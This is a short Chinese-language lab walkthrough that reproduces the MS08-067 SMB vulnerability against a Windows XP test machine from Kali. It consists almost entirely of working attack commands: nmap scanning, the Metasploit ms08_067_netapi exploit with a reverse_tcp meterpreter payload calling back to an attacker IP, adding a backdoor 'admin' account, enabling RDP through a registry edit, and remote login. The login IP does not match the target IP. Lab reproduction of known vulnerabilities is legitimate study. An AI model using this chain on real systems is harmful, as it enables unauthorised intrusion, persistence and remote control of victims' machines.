Ms08067漏洞复现
首先安装好测试环境xp的镜像文件
#nmap扫描
首先确定靶机所在的网段
然后在kali中利用命令扫描出IP:
nmap -sP 192.168.229.0/24
得到:
IP:192.168.229.168
其次在利用nmap扫描出靶机的信息:
nmap --script=vuln 192.168.229.168
得到:
可能存在漏洞ms08_067,使用metasploit攻击`在这
使用:
msfconsole
启动msf,然后在利用
search ms08_067_netapi
查找漏洞路径并使用
得到:
exploit/windows/smb/ms08_067_netapi
使用并设置payload参数:
use exploit/windows/smb/ms08_067_netapi #使用
set RHOST 192.168.229.168 #靶机IP
set LHOST 192.168.229.153 #攻击机IP
set payload windows/meterpreter/reverse_tcp #设置payload
set lport 7777
set target 34
exploit #运行exploit
然后输入:shell
得到:
然后运行
net user #查看当前用户
然后增加一个用户:
net user admin admin /add #增加一个admin用户,密码也为admin
开始3389端口:
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
然后远程登录:
rdesktop 192.168.229.167
然后得到输入admin和密码
进入界面: